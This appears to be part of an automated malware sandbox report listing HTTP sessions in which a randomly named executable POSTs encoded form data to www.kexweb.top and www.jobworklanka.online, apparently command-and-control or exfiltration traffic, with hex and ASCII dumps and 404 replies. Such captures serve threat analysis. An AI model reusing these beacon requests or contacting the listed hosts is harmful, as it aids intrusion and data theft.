                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.44975663.250.47.40801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:18.427360058 CEST10906OUTPOST /3bdq/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kexweb.top
                                                    Origin: http://www.kexweb.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.kexweb.top/3bdq/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 2b 52 66 4c 46 70 59 51 4e 4b 68 49 62 38 73 61 32 65 4a 66 42 61 77 32 41 2b 41 78 70 2f 76 4a 79 73 73 37 33 48 73 4c 46 48 72 6e 71 59 30 61 35 56 51 35 4f 61 73 33 48 72 58 64 6d 42 78 73 36 58 6b 48 79 2b 77 2f 78 73 59 4d 2b 34 37 2f 44 44 6a 51 33 75 69 78 4b 4b 43 6c 35 72 33 57 31 2f 63 35 42 66 6f 37 63 48 4f 71 51 58 4c 52 41 7a 52 71 57 32 72 50 73 48 61 44 4e 67 6d 38 6a 51 2b 2b 78 72 4d 6e 73 59 6c 33 57 2f 52 2f 76 6a 32 6d 4e 49 59 78 6e 44 31 6b 38 6d 71 42 6b [TRUNCATED]
                                                    Data Ascii: y0qt3F=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWmrLTfqllvYyFYnbosKOkQGKQ3TrryCkcJs3nw4hr84rUwbqbp+nz3MjobXpg9nZRayDnslpV2MYrHpec0FEQmKmhfGM8QC5zTPrZOUBy7DaUWDbFs+O2YTshIY267Pib+RfLFpYQNKhIb8sa2eJfBaw2A+Axp/vJyss73HsLFHrnqY0a5VQ5Oas3HrXdmBxs6XkHy+w/xsYM+47/DDjQ3uixKKCl5r3W1/c5Bfo7cHOqQXLRAzRqW2rPsHaDNgm8jQ++xrMnsYl3W/R/vj2mNIYxnD1k8mqBk1qcRIQ2qPLkNBc97jN/CnYknIqJfH6EE1EZFqF75NCudq1f1GRkOniOUy3tPLyfPbeORsdTL87iZkiv93QOZrGqRUPoiUdVBYWo0uv1okAgpVCADYoQTr5Wo/ex2FwFJnySXLB1zjfRD6uRvixTFHjmpTW7t8PGP3s6ptGDil0AM2Qp6lQBOXqXZnaqOCQ0SNdlpGtshq3l0r/3qOStmrg7f/GnPqMqKjjqlnRIeQ2R4Yd/jgcL3gZ8MBOQKeimNSeKQN215WoFGMdVjcglEz5c76PHMMsBmqdnAQtBoKpYGVdEpKFIKCpgy6xJ6kXtrl/HDw8YoRRmlV8pv+qEeORZsZVQ+h4utwUQlyoPH3tE7/J0pz/AvAqFlVqoVrbNPRba+kuok7lZxvuxEPxcjnTDmrtJSjYi1m4RBtoWQEPQSJ3V0nnmPu60djR7WQ1gtWdNzwA50rlE+1fYqZt/COqLQQfBFbARSAnodqMrboreadfgrzeS0MocvxoZB5TjzvfIR6UDHdlVjeJCA9nS/zRNASLUqUI+h2+mJCBYUrDEta5cfmrCJl8QZte87+FQ4vcTyvdFrC++KaQd33SAu5p2UgGC31KVKdILrASegVB7QM9k4h+ybWERGjbvTfu8HTQgQOxrQc57BX41Tbg/3B9vvmBnFh5/c9g [TRUNCATED]
                                                    Sep 26, 2024 09:25:19.074285984 CEST595INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:18 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 389
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.44975763.250.47.40801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:20.968595982 CEST540OUTGET /3bdq/?y0qt3F=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kexweb.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:21.625936031 CEST610INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:21 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 389
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.44975891.184.0.200801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:26.689239979 CEST831OUTPOST /ikh0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Origin: http://www.jobworklanka.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.jobworklanka.online/ikh0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 42 47 6e 63 6a 34 55 78 52 44 61 6c 37 2b 63 50 52 74 58 72 76 44 45 67 63 44 36 7a 70 31 71 41 54 41 3d 3d
                                                    Data Ascii: y0qt3F=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBGncj4UxRDal7+cPRtXrvDEgcD6zp1qATA==
                                                    Sep 26, 2024 09:25:28.538357973 CEST500INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:27 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                    Sep 26, 2024 09:25:28.538990021 CEST500INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:27 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                    Sep 26, 2024 09:25:28.539381981 CEST500INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:27 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.44975991.184.0.200801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:29.238564014 CEST851OUTPOST /ikh0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Origin: http://www.jobworklanka.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.jobworklanka.online/ikh0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 67 54 42 45 7a 48 6b 32 58 4a 49 4a 7a 31 61 57 64 37 65 49 64 58 46 61 66 4b 53 79 41 31 51 77 51 3d
                                                    Data Ascii: y0qt3F=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DgTBEzHk2XJIJz1aWd7eIdXFafKSyA1QwQ=
                                                    Sep 26, 2024 09:25:29.847120047 CEST500INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.44976091.184.0.200801880C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 26, 2024 09:25:31.802073956 CEST10933OUTPOST /ikh0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Origin: http://www.jobworklanka.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.jobworklanka.online/ikh0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 79 30 30 76 49 7a 46 76 2b 56 72 31 77 53 44 6b 58 63 6b 45 36 51 4e 49 4f 51 52 57 56 67 49 38 46 58 66 37 79 62 48 67 6b 2b 4d 31 7a 4c 66 65 75 78 32 2f 6b 52 35 69 2f 4a 52 66 77 2b 7a 44 4f 38 62 59 2b 4e 70 55 35 6a 6b 5a 54 56 69 45 32 56 33 31 58 6d 79 65 77 78 36 4a 58 36 61 42 79 72 78 31 30 70 69 63 34 62 43 47 38 48 71 6c 62 57 31 56 30 65 53 36 4e 45 33 67 46 4d 58 48 53 58 62 65 45 46 54 50 50 44 6b 4a 32 70 6d 6d 53 75 50 71 39 76 33 54 72 63 47 39 6b 36 79 37 2f [TRUNCATED]
                                                    Data Ascii: y0qt3F=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQyy00vIzFv+Vr1wSDkXckE6QNIOQRWVgI8FXf7ybHgk+M1zLfeux2/kR5i/JRfw+zDO8bY+NpU5jkZTViE2V31Xmyewx6JX6aByrx10pic4bCG8HqlbW1V0eS6NE3gFMXHSXbeEFTPPDkJ2pmmSuPq9v3TrcG9k6y7/zvRmh0e4enPpsIBSDjoKk3erOT56EHMjs8gGo1YKlDN7SkPVZipQuCdSvp/nvemte90OZB1XLFUtBy8OWUTcn4l6cowsSt94oT1c2hmH3Q8rtYAfMc4uh9QZ9dn86sR8YHV+w+wHtlFOXqedOZnT5UGzScIBm8vxqbVbCm3wo29GoH+cocsfLqibj+cFzGfR7ZF6Ji6nF5qPnWzbcMyENkpU2vxavQjhi32LavedADP4ZucC4uwblFgkHoJVJgvb1MdP2Pp4K3nvloHyETmL1WBY+rq0VuDvyl2ypPh1ZcbWIFEt8wwfpolRGaQtlbC1xf8RtCmVz+vuMCJuH0Ouv8Z//Mu/8WyZ0RLKqnyAqLTkzEbe6PMLapOMmsH4AWyfqZ4RnMk1qGlpbK2NDA5LJS7qeN3fprZWtVW8yYugK8izpaEyyEHDGUlJYpV1eVqwou0JS+bCzpyBjBpVYbyuxx8Y1iFG/2lonKgKvykkNV5hW6kgJI+SrJ5QnQ1LLQeiIt4N3g/IMUQz7e1A2z9F4T2lvzvSYznE/HOAoGa2h8H239FgXpAP8d6C1ONHU8Y2eEAWZ3vvww6zA7PLU91OpU7E1pam5j5NkY0Ojf5fo6HwNNz5j9y5IitJkjYd+0a0QkovblLupgpvX+irnP3ZIuT4crgepDqbW0 [TRUNCATED]
                                                    Sep 26, 2024 09:25:32.503022909 CEST500INHTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:32 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
